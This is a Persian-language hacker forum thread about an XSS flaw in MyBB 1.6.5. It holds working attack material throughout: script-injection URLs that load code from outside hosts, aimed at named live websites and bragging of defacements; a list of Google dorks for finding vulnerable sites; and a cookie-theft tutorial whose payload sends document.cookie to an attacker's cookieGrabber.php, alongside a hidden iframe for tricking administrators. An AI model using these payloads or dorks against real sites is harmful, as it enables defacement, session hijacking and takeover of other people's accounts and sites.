SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

MyBB 1.6.5 Xss BUg

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • MyBB 1.6.5 Xss BUg

    [align=LEFT][php]

    MyBB 1.6.5 Xss BUg -------------

    Google Dork : inurl:tags.php?tag=

    <script src=http://vgpwestern.dk/iranhack></script>

    Upload Index index (No Format)

    Deface ....

    Demo

    http://www.secarab.com/tags.php?tag=%22%3E%3Cscript%20src=http://vgpwestern.dk/iranhack%3E%3C/script%3E

    [/php]

    [/align]
    [align=center][/align]

  • #2
    RE: MyBB 1.6.5 Xss BUg

    DEFACED by HACKER OF Flood

    xss bug

    [php]http://www.targamiata.com/tags.php?tag=%22%3E%3Cscript%20src=http://a1b2a3j4m5.persiangig.com/index%3E%3C/script%3E[/php]

    [php]http://www.symbian-freeware.com/tags.php?tag=%22%3E%3Cscript%20src=http://a1b2a3j4m5.persiangig.com/index%3E%3C/script%3E
    [/php]

    [php]http://viablog.okmall.tw/tags.php?tag=%22%3E%3Cscript%20src=http://a1b2a3j4m5.persiangig.com/index%3E%3C/script%3E
    [/php]
    [align=center]همه انسان ها یک چیز را میبینند ولی این نوع دید است که انسان های متفاوت را میسازد[/align]

    [align=center]بدلیل امتحانات کم رنگیم ! [/align]

    نظر


    • #3
      RE: MyBB 1.6.5 Xss BUg

      میشه دیفیس کردن با باگ XSS رو تو Zone-h ثبت کرد ؟
      [align=CENTER]In The NaMe Of GoD

      IRANHACK Security Team

      Main Page

      Iranhack.org

      Forum

      Iranhack.org/acc[/align]

      نظر


      • #4
        RE: MyBB 1.6.5 Xss BUg

        خیر

        ولی میتونید کوکی ها رو با استفاده از این باگ بدزدید .
        [align=center][/align]

        نظر


        • #5
          RE: MyBB 1.6.5 Xss BUg

          چجوری میشه کوکی دزدید ؟
          [align=CENTER]In The NaMe Of GoD

          IRANHACK Security Team

          Main Page

          Iranhack.org

          Forum

          Iranhack.org/acc[/align]

          نظر


          • #6
            RE: MyBB 1.6.5 Xss BUg

            چه درک هایی وجود داره برای هک اینطوری . دوم این که ایا میشه شل ران کرد باهاش یا نه ؟
            سوم .مرسی
            چو ایران نباشد تن من مباد

            نظر


            • #7
              Xss Dorks

              [align=LEFT]

              کد:
              
              inurl:com_feedpostold/feedpost.php?url=
              	
              inurl:/products/orkutclone/scrapbook.php?id=
              	
              inurl:/products/classified/headersearch.php?sid=
              	
              inurl:/poll/default.asp?catid=
              	
              inurl:/search_results.php?search=Search&amp;k=
              	
              inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
              	
              inurl:/pages/match_report.php?mid= pages/match_report.php?mid=
              	
              inurl:/notice.php?msg= /notice.php?msg=
              	
              inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
              	
              inurl:/index.php?option=com_easygb&amp;Itemid=
              	
              inurl:/wayvideochat/index.php?r=
              	
              inurl:/view.php?PID= /view.php?PID=
              	
              inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
              	
              inurl:/showproperty.php?id= /showproperty.php?id=
              	
              inurl:/vehicle/buy_do_search/?order_direction=
              	
              inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
              	
              inurl:/winners.php?year=2008&amp;type= /winners.php?year=2008&amp;type=
              	
              inurl:/schoolmv2/html/studentmain.php?session=
              	
              inurl:/site_search.php?sfunction= /site_search.php?sfunction=
              	
              inurl:/search.php?search_keywords= /search.php?search_keywords=
              	
              inurl:/hexjector.php?site= /hexjector.php?site=
              	
              inurl:/news.php?id= /news.php?id=
              	
              inurl:/index.php?view=help&amp;faq=1&amp;ref=
              	
              inurl:"contentPage.php?id="
              	
              inurl:"displayResource.php?id="
              	
              intext:"Website by Mile High Creative"
              	
              inurl:/index.php?option=com_reservations&amp;task=askope&amp;nidser=2&amp;namser= "com_reservations"
              	
              inurl:/info.asp?page=fullstory&amp;key=1&amp;news_type=news&amp;onvan=
              	
              inurl:/ser/parohija.php?id= /ser/parohija.php?id=
              	
              inurl:/strane/pas.php?id= /strane/pas.php?id=
              	
              inurl:/main.php?sid= /main.php?sid=
              [/align]
              [align=center][/align]

              نظر


              • #8
                RE: MyBB 1.6.5 Xss BUg

                لطفا آموزش قرض گرفتن کوکی رو هم بزارید :d
                [align=center]ما جایی زندگی می کنیم که

                هرزگی : مد

                بی آبرویی : کلاس

                مستی و دود : تفریح

                و لاشخوری و گرگ بودن

                رمـز موفقیته !!!
                [/align]

                نظر


                • #9
                  دزدیدن کوکی در XSS

                  برای دزدین کوکی روش زیر را طی کنید :

                  هدف شما باید طوری باشد که صفحه آسیب پذیر برای مدیر سایت لود بشه تا بتونه کوکی مربوطه رو براتون ارسال کنه .

                  ابتدا درون یک هاست فایلهای کوکی گربر خودتونو قرار بدید و سطح دسترسی اونو به 777 برسونید .

                  سپس

                  کد:
                  site.com/search.php?query=<script>document.location='http://Your_site.com/cookieGrabber.php?cookie='.concat(escape(document.cookie));</script>
                  این لینک اگر برای ادمین وبسایت یا سایر یوزر های وبسایت باز بشه کوکی های اون به هاست ارسال میشه و میتونید با استفاده از مرورگر فایرفاکس با گوگل کروم با اون کوکی ها بیایید بالا و مدیریت سایت رو در دست بگیرید .

                  سایت هایی که در قسمت ارسال مطلب آسیب پذیری XSS دارن مثل انجمن ها خیلی راحت تر میشه کوکی اونها رو دزدید اما سایر سایتها باید یه مقدار مهندسی اجتماعی هم کنار کار انجام بدید .

                  در نظر داشته باشید طراحی صفحات برای گول زدن کلاینت ها و اجرای این لینک با استفاده از IFRAME هم یکی از همین راههای فریب هست :

                  کد:
                  <iframe
                  src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/Your_site.com/cookieGrabber.php?cookie='.concat(escape(document.cookie));</script>" width="1" heigth="1"></iframe>
                  [align=center][/align]

                  نظر

                  صبر کنید ..
                  X